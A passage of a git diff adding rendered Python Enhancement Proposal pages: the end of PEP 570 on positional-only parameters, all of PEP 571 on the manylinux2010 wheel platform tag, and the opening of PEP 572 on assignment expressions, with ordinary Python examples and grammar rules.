+>>>> import binascii; binascii.crc32(data=b'data')
+2918445923
+
+
+

Other Python implementations can reproduce the CPython APIs manually, but this +goes against the spirit of PEP 399 to avoid duplication of effort by +mandating that all modules added to Python’s standard library must have a +pure Python implementation with the same interface and semantics.

+
+
+

Consistency in Subclasses

+

Another scenario where positional-only parameters provide benefit occurs when a +subclass overrides a method of the base class and changes the name of parameters +that are intended to be positional:

+
class Base:
+    def meth(self, arg: int) -> str:
+        ...
+
+class Sub(Base):
+    def meth(self, other_arg: int) -> str:
+        ...
+
+def func(x: Base):
+    x.meth(arg=12)
+
+func(Sub())  # Runtime error
+
+
+

This situation could be considered a Liskov violation — the subclass cannot be +used in a context when an instance of the base class is expected. Renaming +arguments when overloading methods can happen when the subclass has reasons to +use a different choice for the parameter name that is more appropriate for the +specific domain of the subclass (e.g., when subclassing Mapping to +implement a DNS lookup cache, the derived class may not want to use the generic +argument names ‘key’ and ‘value’ but rather ‘host’ and ‘address’). Having this +function definition with positional-only parameters can avoid this problem +because users will not be able to call the interface using keyword arguments. +In general, designing for subclassing usually involves anticipating code that +hasn’t been written yet and over which the author has no control. Having +measures that can facilitate the evolution of interfaces in a +backwards-compatible would be useful for library authors.

+
+
+

Optimizations

+

A final argument in favor of positional-only parameters is that they allow some +new optimizations like the ones already present in the argument clinic due to +the fact that parameters are expected to be passed in strict order. For example, CPython’s +internal METH_FASTCALL calling convention has been recently specialized for +functions with positional-only parameters to eliminate the cost for handling +empty keywords. Similar performance improvements can be applied when creating +the evaluation frame of Python functions thanks to positional-only parameters.

+
+
+
+

Specification

+
+

Syntax and Semantics

+

From the “ten-thousand foot view”, eliding *args and **kwargs for +illustration, the grammar for a function definition would look like:

+
def name(positional_or_keyword_parameters, *, keyword_only_parameters):
+
+
+

Building on that example, the new syntax for function definitions would look +like:

+
def name(positional_only_parameters, /, positional_or_keyword_parameters,
+         *, keyword_only_parameters):
+
+
+

The following would apply:

+
    +
  • All parameters left of the / are treated as positional-only.
  • +
  • If / is not specified in the function definition, that function does not +accept any positional-only arguments.
  • +
  • The logic around optional values for positional-only parameters remains the +same as for positional-or-keyword parameters.
  • +
  • Once a positional-only parameter is specified with a default, the +following positional-only and positional-or-keyword parameters need to have +defaults as well.
  • +
  • Positional-only parameters which do not have default +values are required positional-only parameters.
  • +
+

Therefore, the following would be valid function definitions:

+
def name(p1, p2, /, p_or_kw, *, kw):
+def name(p1, p2=None, /, p_or_kw=None, *, kw):
+def name(p1, p2=None, /, *, kw):
+def name(p1, p2=None, /):
+def name(p1, p2, /, p_or_kw):
+def name(p1, p2, /):
+
+
+

Just like today, the following would be valid function definitions:

+
def name(p_or_kw, *, kw):
+def name(*, kw):
+
+
+

While the following would be invalid:

+
def name(p1, p2=None, /, p_or_kw, *, kw):
+def name(p1=None, p2, /, p_or_kw=None, *, kw):
+def name(p1=None, p2, /):
+
+
+
+
+

Full Grammar Specification

+

A simplified view of the proposed grammar specification is:

+
typedargslist:
+  tfpdef ['=' test] (',' tfpdef ['=' test])* ',' '/' [','  # and so on
+
+varargslist:
+  vfpdef ['=' test] (',' vfpdef ['=' test])* ',' '/' [','  # and so on
+
+
+

Based on the reference implementation in this PEP, the new rule for +typedarglist would be:

+
typedargslist: (tfpdef ['=' test] (',' tfpdef ['=' test])* ',' '/' [',' [tfpdef ['=' test] (',' tfpdef ['=' test])* [',' [
+        '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+      | '**' tfpdef [',']]]
+  | '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+  | '**' tfpdef [',']] ] )| (
+   tfpdef ['=' test] (',' tfpdef ['=' test])* [',' [
+        '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+      | '**' tfpdef [',']]]
+ | '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+ | '**' tfpdef [','])
+
+
+

and for varargslist would be:

+
varargslist: vfpdef ['=' test ](',' vfpdef ['=' test])* ',' '/' [',' [ (vfpdef ['=' test] (',' vfpdef ['=' test])* [',' [
+        '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+      | '**' vfpdef [',']]]
+  | '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+  | '**' vfpdef [',']) ]] | (vfpdef ['=' test] (',' vfpdef ['=' test])* [',' [
+        '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+      | '**' vfpdef [',']]]
+  | '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+  | '**' vfpdef [',']
+)
+
+
+
+
+

Semantic Corner Case

+

The following is an interesting corollary of the specification. +Consider this function definition:

+
def foo(name, **kwds):
+    return 'name' in kwds
+
+
+

There is no possible call that will make it return True. +For example:

+
>>> foo(1, **{'name': 2})
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: foo() got multiple values for argument 'name'
+>>>
+
+
+

But using / we can support this:

+
def foo(name, /, **kwds):
+    return 'name' in kwds
+
+
+

Now the above call will return True.

+

In other words, the names of positional-only parameters can be used in +**kwds without ambiguity. (As another example, this benefits the +signatures of dict() and dict.update().)

+
+
+

Origin of “/” as a Separator

+

Using / as a separator was initially proposed by Guido van Rossum +in 2012 [8] :

+
+
Alternative proposal: how about using ‘/’ ? It’s kind of the opposite +of ‘*’ which means “keyword argument”, and ‘/’ is not a new character.
+
+
+
+

How To Teach This

+

Introducing a dedicated syntax to mark positional-only parameters is closely +analogous to existing keyword-only arguments. Teaching these concepts together +may simplify how to teach the possible function definitions a user may encounter or +design.

+

This PEP recommends adding a new subsection to the Python documentation, in the +section “More on Defining Functions”, where the rest of the argument types +are discussed. The following paragraphs serve as a draft for these additions. +They will introduce the notation for both positional-only and +keyword-only parameters. It is not intended to be exhaustive, nor should it be +considered the final version to be incorporated into the documentation.

+
+

By default, arguments may be passed to a Python function either by position +or explicitly by keyword. For readability and performance, it makes sense to +restrict the way arguments can be passed so that a developer need only look +at the function definition to determine if items are passed by position, by +position or keyword, or by keyword.

+

A function definition may look like:

+
def f(pos1, pos2, /, pos_or_kwd, *, kwd1, kwd2):
+      -----------    ----------     ----------
+        |             |                  |
+        |        Positional or keyword   |
+        |                                - Keyword only
+         -- Positional only
+
+
+

where / and * are optional. If used, these symbols indicate the kind of +parameter by how the arguments may be passed to the function: +positional-only, positional-or-keyword, and keyword-only. Keyword parameters +are also referred to as named parameters.

+
+

Positional-or-Keyword Arguments

+

If / and * are not present in the function definition, arguments may +be passed to a function by position or by keyword.

+
+
+

Positional-Only Parameters

+

Looking at this in a bit more detail, it is possible to mark certain parameters +as positional-only. If positional-only, the parameters’ order matters, and +the parameters cannot be passed by keyword. Positional-only parameters would +be placed before a / (forward-slash). The / is used to logically +separate the positional-only parameters from the rest of the parameters. +If there is no / in the function definition, there are no positional-only +parameters.

+

Parameters following the / may be positional-or-keyword or keyword-only.

+
+
+

Keyword-Only Arguments

+

To mark parameters as keyword-only, indicating the parameters must be passed +by keyword argument, place an * in the arguments list just before the first +keyword-only parameter.

+
+
+

Function Examples

+

Consider the following example function definitions paying close attention to the +markers / and *:

+
>>> def standard_arg(arg):
+...     print(arg)
+...
+>>> def pos_only_arg(arg, /):
+...     print(arg)
+...
+>>> def kwd_only_arg(*, arg):
+...     print(arg)
+...
+>>> def combined_example(pos_only, /, standard, *, kwd_only):
+...     print(pos_only, standard, kwd_only)
+
+
+

The first function definition standard_arg, the most familiar form, +places no restrictions on the calling convention and arguments may be +passed by position or keyword:

+
>>> standard_arg(2)
+2
+
+>>> standard_arg(arg=2)
+2
+
+
+

The second function pos_only_arg is restricted to only use positional +parameters as there is a / in the function definition:

+
>>> pos_only_arg(1)
+1
+
+>>> pos_only_arg(arg=1)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pos_only_arg() got an unexpected keyword argument 'arg'
+
+
+

The third function kwd_only_args only allows keyword arguments as indicated +by a * in the function definition:

+
>>> kwd_only_arg(3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: kwd_only_arg() takes 0 positional arguments but 1 was given
+
+>>> kwd_only_arg(arg=3)
+3
+
+
+

And the last uses all three calling conventions in the same function +definition:

+
>>> combined_example(1, 2, 3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: combined_example() takes 2 positional arguments but 3 were given
+
+>>> combined_example(1, 2, kwd_only=3)
+1 2 3
+
+>>> combined_example(1, standard=2, kwd_only=3)
+1 2 3
+
+>>> combined_example(pos_only=1, standard=2, kwd_only=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: combined_example() got an unexpected keyword argument 'pos_only'
+
+
+
+
+

Recap

+

The use case will determine which parameters to use in the function definition:

+
def f(pos1, pos2, /, pos_or_kwd, *, kwd1, kwd2):
+
+
+

As guidance:

+
    +
  • Use positional-only if names do not matter or have no meaning, and there are +only a few arguments which will always be passed in the same order.
  • +
  • Use keyword-only when names have meaning and the function definition is +more understandable by being explicit with names.
  • +
+
+
+
+

Reference Implementation

+

An initial implementation that passes the CPython test suite is available for +evaluation [10].

+

The benefits of this implementations are speed of handling positional-only +parameters, consistency with the implementation of keyword-only parameters (PEP +3102), and a simpler implementation of all the tools and modules that would be +impacted by this change.

+
+
+

Rejected Ideas

+
+

Do Nothing

+

Always an option — the status quo. While this was considered, the +aforementioned benefits are worth the addition to the language.

+
+
+

Decorators

+

It has been suggested on python-ideas [9] to +provide a decorator written in Python for this feature.

+

This approach has the benefit of not polluting function definition with +additional syntax. However, we have decided to reject this idea because:

+
    +
  • It introduces an asymmetry with how parameter behavior is declared.
  • +
  • It makes it difficult for static analyzers and type checkers to +safely identify positional-only parameters. They would need to query the AST +for the list of decorators and identify the correct one by name or with extra +heuristics, while keyword-only parameters are exposed +directly in the AST. In order for tools to correctly identify +positional-only parameters, they would need to execute the module to access +any metadata the decorator is setting.
  • +
  • Any error with the declaration will be reported only at runtime.
  • +
  • It may be more difficult to identify positional-only parameters in long +function definitions, as it forces the user to count them to know which is +the last one that is impacted by the decorator.
  • +
  • The / syntax has already been introduced for C functions. This +inconsistency will make it more challenging to implement any tools and +modules that deal with this syntax — including but not limited to, the +argument clinic, the inspect module and the ast module.
  • +
  • The decorator implementation would likely impose a runtime performance cost, +particularly when compared to adding support directly to the interpreter.
  • +
+
+
+

Per-Argument Marker

+

A per-argument marker is another language-intrinsic option. The approach adds +a token to each of the parameters to indicate they are positional-only and +requires those parameters to be placed together. Example:

+
def (.arg1, .arg2, arg3):
+
+
+

Note the dot (i.e., .) on .arg1 and .arg2. While this approach +may be easier to read, it has been rejected because / as an explicit marker +is congruent with * for keyword-only arguments and is less error-prone.

+

It should be noted that some libraries already use leading underscore +[12] to conventionally indicate parameters as positional-only.

+
+
+

Using “__” as a Per-Argument Marker

+

Some libraries and applications (like mypy or jinja) use names +prepended with a double underscore (i.e., __) as a convention to indicate +positional-only parameters. We have rejected the idea of introducing __ as +a new syntax because:

+
    +
  • It is a backwards-incompatible change.
  • +
  • It is not symmetric with how the keyword-only parameters are currently +declared.
  • +
  • Querying the AST for positional-only parameters would require checking the +normal arguments and inspecting their names, whereas keyword-only parameters +have a property associated with them (FunctionDef.args.kwonlyargs).
  • +
  • Every parameter would need to be inspected to know when positional-only +arguments end.
  • +
  • The marker is more verbose, forcing marking every positional-only parameter.
  • +
  • It clashes with other uses of the double underscore prefix like invoking name +mangling in classes.
  • +
+
+
+

Group Positional-Only Parameters With Parentheses

+

Tuple parameter unpacking is a Python 2 feature which allows the use of a tuple +as a parameter in a function definition. It allows a sequence argument to be +unpacked automatically. An example is:

+
def fxn(a, (b, c), d):
+    pass
+
+
+

Tuple argument unpacking was removed in Python 3 (PEP 3113). There has been a +proposition to reuse this syntax to implement positional-only parameters. We +have rejected this syntax for indicating positional only parameters for several +reasons:

+
    +
  • The syntax is asymmetric with respect to how keyword-only parameters are +declared.
  • +
  • Python 2 uses this syntax which could raise confusion regarding the behavior +of this syntax. This would be surprising to users porting Python 2 codebases +that were using this feature.
  • +
  • This syntax is very similar to tuple literals. This can raise additional +confusion because it can be confused with a tuple declaration.
  • +
+
+
+

After Separator Proposal

+

Marking positional-parameters after the / was another idea considered. +However, we were unable to find an approach which would modify the arguments +after the marker. Otherwise, would force the parameters before the marker to +be positional-only as well. For example:

+
def (x, y, /, z):
+
+
+

If we define that / marks z as positional-only, it would not be +possible to specify x and y as keyword arguments. Finding a way to +work around this limitation would add confusion given that at the moment +keyword arguments cannot be followed by positional arguments. Therefore, / +would make both the preceding and following parameters positional-only.

+
+
+
+

Thanks

+

Credit for some of the content of this PEP is contained in Larry Hastings’s +PEP 457.

+

Credit for the use of / as the separator between positional-only and +positional-or-keyword parameters go to Guido van Rossum, in a proposal from +2012. [8]

+

Credit for discussion about the simplification of the grammar goes to +Braulio Valdivieso.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0570.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0571/index.html b/pep-0571/index.html new file mode 100644 index 00000000000..d38e53a1732 --- /dev/null +++ b/pep-0571/index.html @@ -0,0 +1,582 @@ + + + + + + + + PEP 571 – The manylinux2010 Platform Tag | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 571 – The manylinux2010 Platform Tag

+
+
Author:
+
Mark Williams <mrw at enotuniq.org>, +Geoffrey Thomas <geofft at ldpreload.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
05-Feb-2018
+
Post-History:
+

+
Superseded-By:
+
600
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the creation of a manylinux2010 platform tag to +succeed the manylinux1 tag introduced by PEP 513. It also +proposes that PyPI and pip both be updated to support uploading, +downloading, and installing manylinux2010 distributions on compatible +platforms.

+
+
+

Rationale

+

True to its name, the manylinux1 platform tag has made the +installation of binary extension modules a reality on many Linux +systems. Libraries like cryptography [2] and numpy [3] are +more accessible to Python developers now that their installation on +common architectures does not depend on fragile development +environments and build toolchains.

+

manylinux1 wheels achieve their portability by allowing the +extension modules they contain to link against only a small set of +system-level shared libraries that export versioned symbols old enough +to benefit from backwards-compatibility policies. Extension modules +in a manylinux1 wheel that rely on glibc, for example, must be +built against version 2.5 or earlier; they may then be run systems +that provide more recent glibc version that still export the +required symbols at version 2.5.

+

PEP 513 drew its whitelisted shared libraries and their symbol +versions from CentOS 5.11, which was the oldest supported CentOS +release at the time of its writing. Unfortunately, CentOS 5.11 +reached its end-of-life on March 31st, 2017 with a clear warning +against its continued use. [4] No further updates, such as security +patches, will be made available. This means that its packages will +remain at obsolete versions that hamper the efforts of Python software +packagers who use the manylinux1 Docker image.

+

CentOS 6 is now the oldest supported CentOS release, and will receive +maintenance updates through November 30th, 2020. [5] We propose that +a new PEP 425-style platform tag called manylinux2010 be derived +from CentOS 6 and that the manylinux toolchain, PyPI, and pip +be updated to support it.

+

This was originally proposed as manylinux2, but the versioning has +been changed to use calendar years (also known as CalVer [22]). This +makes it easier to define future manylinux tags out of order: for +example, a hypothetical manylinux2017 standard may be defined via +a new PEP before manylinux2014, or a manylinux2007 standard +might be defined that targets systems older than this PEP but newer +than manylinux1.

+

Calendar versioning also gives a rough idea of which Linux +distribution versions support which tag: manylinux2010 will work +on most distribution versions released since 2010. This is only an +approximation, however: the actual compatibility rules are defined +below, and some newer distributions may not meet them.

+
+
+

The manylinux2010 policy

+

The following criteria determine a linux wheel’s eligibility for +the manylinux2010 tag:

+
    +
  1. The wheel may only contain binary executables and shared objects +compiled for one of the two architectures supported by CentOS 6: +x86_64 or i686. [5]
  2. +
  3. The wheel’s binary executables or shared objects may not link +against externally-provided libraries except those in the following +whitelist:
    libgcc_s.so.1
    +libstdc++.so.6
    +libm.so.6
    +libdl.so.2
    +librt.so.1
    +libc.so.6
    +libnsl.so.1
    +libutil.so.1
    +libpthread.so.0
    +libresolv.so.2
    +libX11.so.6
    +libXext.so.6
    +libXrender.so.1
    +libICE.so.6
    +libSM.so.6
    +libGL.so.1
    +libgobject-2.0.so.0
    +libgthread-2.0.so.0
    +libglib-2.0.so.0
    +
    +
    +

    This list is identical to the externally-provided libraries +whitelisted for manylinux1, minus libncursesw.so.5 and +libpanelw.so.5. [7] libpythonX.Y remains ineligible for +inclusion for the same reasons outlined in PEP 513.

    +

    libcrypt.so.1 was retrospectively removed from the whitelist after +Fedora 30 was released with libcrypt.so.2 instead.

    +

    On Debian-based systems, these libraries are provided by the packages:

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    PackageLibraries
    libc6libdl.so.2, libresolv.so.2, librt.so.1, libc.so.6, +libpthread.so.0, libm.so.6, libutil.so.1, libnsl.so.1
    libgcc1libgcc_s.so.1
    libgl1libGL.so.1
    libglib2.0-0libgobject-2.0.so.0, libgthread-2.0.so.0, libglib-2.0.so.0
    libice6libICE.so.6
    libsm6libSM.so.6
    libstdc++6libstdc++.so.6
    libx11-6libX11.so.6
    libxext6libXext.so.6
    libxrender1libXrender.so.1
    +

    On RPM-based systems, they are provided by these packages:

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    PackageLibraries
    glib2libglib-2.0.so.0, libgthread-2.0.so.0, libgobject-2.0.so.0
    glibclibresolv.so.2, libutil.so.1, libnsl.so.1, librt.so.1, +libpthread.so.0, libdl.so.2, libm.so.6, libc.so.6
    libICElibICE.so.6
    libX11libX11.so.6
    libXext:libXext.so.6
    libXrenderlibXrender.so.1
    libgcc:libgcc_s.so.1
    libstdc++libstdc++.so.6
    mesalibGL.so.1
    +
  4. +
  5. If the wheel contains binary executables or shared objects linked +against any whitelisted libraries that also export versioned +symbols, they may only depend on the following maximum versions:
    GLIBC_2.12
    +CXXABI_1.3.3
    +GLIBCXX_3.4.13
    +GCC_4.5.0
    +
    +
    +

    As an example, manylinux2010 wheels may include binary artifacts +that require glibc symbols at version GLIBC_2.4, because +this an earlier version than the maximum of GLIBC_2.12.

    +
  6. +
  7. If a wheel is built for any version of CPython 2 or CPython +versions 3.0 up to and including 3.2, it must include a CPython +ABI tag indicating its Unicode ABI. A manylinux2010 wheel built +against Python 2, then, must include either the cpy27mu tag +indicating it was built against an interpreter with the UCS-4 ABI +or the cpy27m tag indicating an interpreter with the UCS-2 +ABI. (PEP 3149, [9])
  8. +
  9. A wheel must not require the PyFPE_jbuf symbol. This is +achieved by building it against a Python compiled without the +--with-fpectl configure flag.
  10. +
+
+
+

Compilation of Compliant Wheels

+

Like manylinux1, the auditwheel tool adds manylinux2010 +platform tags to linux wheels built by pip wheel or +bdist_wheel in a manylinux2010 Docker container.

+
+

Docker Image

+

Two manylinux2010 Docker images based on CentOS 6 are +provided for building binary linux wheels that can reliably be +converted to manylinux2010 wheels. [10] The x86_64 and i686 images comes with a +new compiler suite installed (gcc, g++, and gfortran +from devtoolset-8) as well as the latest releases of Python and pip.

+
+

Compatibility with kernels that lack vsyscall

+

A Docker container assumes that its userland is compatible with its +host’s kernel. Unfortunately, an increasingly common kernel +configuration breaks this assumption for x86_64 CentOS 6 Docker +images.

+

Versions 2.14 and earlier of glibc require the kernel provide an +archaic system call optimization known as vsyscall on x86_64. [11] +To effect the optimization, the kernel maps a read-only page of +frequently-called system calls – most notably time(2) – into +each process at a fixed memory location. glibc then invokes these +system calls by dereferencing a function pointer to the appropriate +offset into the vsyscall page and calling it. This avoids the +overhead associated with invoking the kernel that affects normal +system call invocation. vsyscall has long been deprecated in +favor of an equivalent mechanism known as vDSO, or “virtual dynamic +shared object”, in which the kernel instead maps a relocatable virtual +shared object containing the optimized system calls into each +process. [12]

+

The vsyscall page has serious security implications because it +does not participate in address space layout randomization (ASLR). +Its predictable location and contents make it a useful source of +gadgets used in return-oriented programming attacks. [13] At the same +time, its elimination breaks the x86_64 ABI, because glibc +versions that depend on vsyscall suffer from segmentation faults +when attempting to dereference a system call pointer into a +non-existent page. As a compromise, Linux 3.1 implemented an +“emulated” vsyscall that reduced the executable code, and thus the +material for ROP gadgets, mapped into the process. [14] +vsyscall=emulated has been the default configuration in most +distribution’s kernels for many years.

+

Unfortunately, vsyscall emulation still exposes predictable code +at a reliable memory location, and continues to be useful for +return-oriented programming. [15] Because most distributions have now +upgraded to glibc versions that do not depend on vsyscall, +they are beginning to ship kernels that do not support vsyscall at +all. [16]

+

CentOS 5.11 and 6 both include versions of glibc that depend on +the vsyscall page (2.5 and 2.12.2 respectively), so containers +based on either cannot run under kernels provided with many +distribution’s upcoming releases. [17] If Travis CI, for example, +begins running jobs under +a kernel that does not provide the vsyscall interface, Python +packagers will not be able to use our Docker images there to build +manylinux wheels. [18]

+

We have derived a patch from the glibc git repository that +backports the removal of all dependencies on vsyscall to the +version of glibc included with our manylinux2010 image. [19] +Rebuilding glibc, and thus building manylinux2010 image itself, +still requires a host kernel that provides the vsyscall mechanism, +but the resulting image can be both run on hosts that provide it and +those that do not. Because the vsyscall interface is an +optimization that is only applied to running processes, the +manylinux2010 wheels built with this modified image should be +identical to those built on an unmodified CentOS 6 system. Also, the +vsyscall problem applies only to x86_64; it is not part of the +i686 ABI.

+
+
+
+

Auditwheel

+

The auditwheel tool has also been updated to produce +manylinux2010 wheels. [20] Its behavior and purpose are otherwise +unchanged from PEP 513.

+
+
+
+

Platform Detection for Installers

+

Platforms may define a manylinux2010_compatible boolean attribute on +the _manylinux module described in PEP 513. A platform is +considered incompatible with manylinux2010 if the attribute is +False.

+

If the _manylinux module is not found, or it does not have the attribute +manylinux2010_compatible, tools may fall back to checking for glibc. If the +platform has glibc 2.12 or newer, it is assumed to be compatible unless the +_manylinux module says otherwise.

+

Specifically, the algorithm we propose is:

+
def is_manylinux2010_compatible():
+    # Only Linux, and only x86-64 / i686
+    from distutils.util import get_platform
+    if get_platform() not in ["linux-x86_64", "linux-i686"]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+        return bool(_manylinux.manylinux2010_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 6 uses glibc 2.12.
+    # PEP 513 contains an implementation of this function.
+    return have_compatible_glibc(2, 12)
+
+
+
+
+

Backwards compatibility with manylinux1 wheels

+

As explained in PEP 513, the specified symbol versions for +manylinux1 whitelisted libraries constitute an upper bound. The +same is true for the symbol versions defined for manylinux2010 in +this PEP. As a result, manylinux1 wheels are considered +manylinux2010 wheels. A pip that recognizes the manylinux2010 +platform tag will thus install manylinux1 wheels for +manylinux2010 platforms – even when explicitly set – when no +manylinux2010 wheels are available. [21]

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux2010 platform tag +to be uploaded in the same way that it permits manylinux1. It +should not attempt to verify the compatibility of manylinux2010 +wheels.

+
+
+

Summary of changes to PEP 571

+

The following changes were made to this PEP based on feedback received after +it was approved:

+
    +
  • The maximum version symbol of libgcc_s was updated from GCC_4.3.0 +to GCC_4.5.0 to address 32-bit Cent OS 6. This doesn’t affect x86_64 +because libgcc_s for x86_64 has no additional symbol from +GCC_4.3.0 to GCC_4.5.0.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0571.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0572/index.html b/pep-0572/index.html new file mode 100644 index 00000000000..7a4aff9cd53 --- /dev/null +++ b/pep-0572/index.html @@ -0,0 +1,1474 @@ + + + + + + + + PEP 572 – Assignment Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 572 – Assignment Expressions

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>, Tim Peters <tim.peters at gmail.com>, +Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Feb-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, +25-Apr-2018, 09-Jul-2018, 05-Aug-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal for creating a way to assign to variables within an +expression using the notation NAME := expr.

+

As part of this change, there is also an update to dictionary comprehension +evaluation order to ensure key expressions are executed before value +expressions (allowing the key to be bound to a name and then re-used as part of +calculating the corresponding value).

+

During discussion of this PEP, the operator became informally known as +“the walrus operator”. The construct’s formal name is “Assignment Expressions” +(as per the PEP title), but they may also be referred to as “Named Expressions” +(e.g. the CPython reference implementation uses that name internally).

+
+
+

Rationale

+

Naming the result of an expression is an important part of programming, +allowing a descriptive name to be used in place of a longer expression, +and permitting reuse. Currently, this feature is available only in +statement form, making it unavailable in list comprehensions and other +expression contexts.

+

Additionally, naming sub-parts of a large expression can assist an interactive +debugger, providing useful display hooks and partial results. Without a way to +capture sub-expressions inline, this would require refactoring of the original +code; with assignment expressions, this merely requires the insertion of a few +name := markers. Removing the need to refactor reduces the likelihood that +the code be inadvertently changed as part of debugging (a common cause of +Heisenbugs), and is easier to dictate to another programmer.

+
+

The importance of real code

+

During the development of this PEP many people (supporters and critics +both) have had a tendency to focus on toy examples on the one hand, +and on overly complex examples on the other.

+

The danger of toy examples is twofold: they are often too abstract to +make anyone go “ooh, that’s compelling”, and they are easily refuted +with “I would never write it that way anyway”.

+

The danger of overly complex examples is that they provide a +convenient strawman for critics of the proposal to shoot down (“that’s +obfuscated”).

+

Yet there is some use for both extremely simple and extremely complex +examples: they are helpful to clarify the intended semantics. +Therefore, there will be some of each below.

+

However, in order to be compelling, examples should be rooted in +real code, i.e. code that was written without any thought of this PEP, +as part of a useful application, however large or small. Tim Peters +has been extremely helpful by going over his own personal code +repository and picking examples of code he had written that (in his +view) would have been clearer if rewritten with (sparing) use of +assignment expressions. His conclusion: the current proposal would +have allowed a modest but clear improvement in quite a few bits of +code.

+

Another use of real code is to observe indirectly how much value +programmers place on compactness. Guido van Rossum searched through a +Dropbox code base and discovered some evidence that programmers value +writing fewer lines over shorter lines.

+

Case in point: Guido found several examples where a programmer +repeated a subexpression, slowing down the program, in order to save +one line of code, e.g. instead of writing:

+
match = re.match(data)
+group = match.group(1) if match else None
+
+
+

they would write:

+
group = re.match(data).group(1) if re.match(data) else None
+
+
+

Another example illustrates that programmers sometimes do more work to +save an extra level of indentation:

+
match1 = pattern1.match(data)
+match2 = pattern2.match(data)
+if match1:
+    result = match1.group(1)
+elif match2:
+    result = match2.group(2)
+else:
+    result = None
+
+
+

This code tries to match pattern2 even if pattern1 has a match +(in which case the match on pattern2 is never used). The more +efficient rewrite would have been:

+
match1 = pattern1.match(data)
+if match1:
+    result = match1.group(1)
+else:
+    match2 = pattern2.match(data)
+    if match2:
+        result = match2.group(2)
+    else:
+        result = None
+
+
+
+
+
+

Syntax and semantics

+

In most contexts where arbitrary Python expressions can be used, a +named expression can appear. This is of the form NAME := expr +where expr is any valid Python expression other than an +unparenthesized tuple, and NAME is an identifier.

+

The value of such a named expression is the same as the incorporated +expression, with the additional side-effect that the target is assigned +that value:

+
# Handle a matched regex
+if (match := pattern.search(data)) is not None:
+    # Do something with match
+
+# A loop that can't be trivially rewritten using 2-arg iter()
+while chunk := file.read(8192):
+   process(chunk)
+
+# Reuse a value that's expensive to compute
+[y := f(x), y**2, y**3]
+
+# Share a subexpression between a comprehension filter clause and its output
+filtered_data = [y for x in data if (y := f(x)) is not None]
+
+
+
+

Exceptional cases

+

There are a few places where assignment expressions are not allowed, +in order to avoid ambiguities or user confusion:

+
    +
  • Unparenthesized assignment expressions are prohibited at the top +level of an expression statement. Example:
    y := f(x)  # INVALID
    +(y := f(x))  # Valid, though not recommended
    +
    +
    +

    This rule is included to simplify the choice for the user between an +assignment statement and an assignment expression – there is no +syntactic position where both are valid.

    +
  • +
  • Unparenthesized assignment expressions are prohibited at the top +level of the right hand side of an assignment statement. Example:
    y0 = y1 := f(x)  # INVALID
    +y0 = (y1 := f(x))  # Valid, though discouraged
    +
    +
    +

    Again, this rule is included to avoid two visually similar ways of +saying the same thing.

    +
  • +
  • Unparenthesized assignment expressions are prohibited for the value +of a keyword argument in a call. Example:
    foo(x = y := f(x))  # INVALID
    +foo(x=(y := f(x)))  # Valid, though probably confusing
    +
    +
    +

    This rule is included to disallow excessively confusing code, and +because parsing keyword arguments is complex enough already.

    +
  • +
  • Unparenthesized assignment expressions are prohibited at the top +level of a function default value. Example:
    def foo(answer = p := 42):  # INVALID
    +    ...
    +def foo(answer=(p := 42)):  # Valid, though not great style
    +    ...
    +
    +
    +

    This rule is included to discourage side effects in a position whose +exact semantics are already confusing to many users (cf. the common +style recommendation against mutable default values), and also to +echo the similar prohibition in calls (the previous bullet).

    +
  • +
  • Unparenthesized assignment expressions are prohibited as annotations +for arguments, return values and assignments. Example:
    def foo(answer: p := 42 = 5):  # INVALID
    +    ...
    +def foo(answer: (p := 42) = 5):  # Valid, but probably never useful
    +    ...
    +
    +
    +

